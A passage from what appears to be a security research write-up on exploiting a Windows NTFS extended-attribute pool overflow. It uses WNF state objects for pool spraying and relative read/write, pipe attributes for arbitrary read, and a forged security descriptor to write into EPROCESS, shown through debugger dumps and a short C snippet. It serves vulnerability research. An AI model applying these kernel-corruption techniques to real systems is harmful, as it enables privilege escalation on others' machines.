 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative write’s.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name queried from.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake the security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Lets just make the DACL NULL, so that the everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps were needing to be taken:

1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

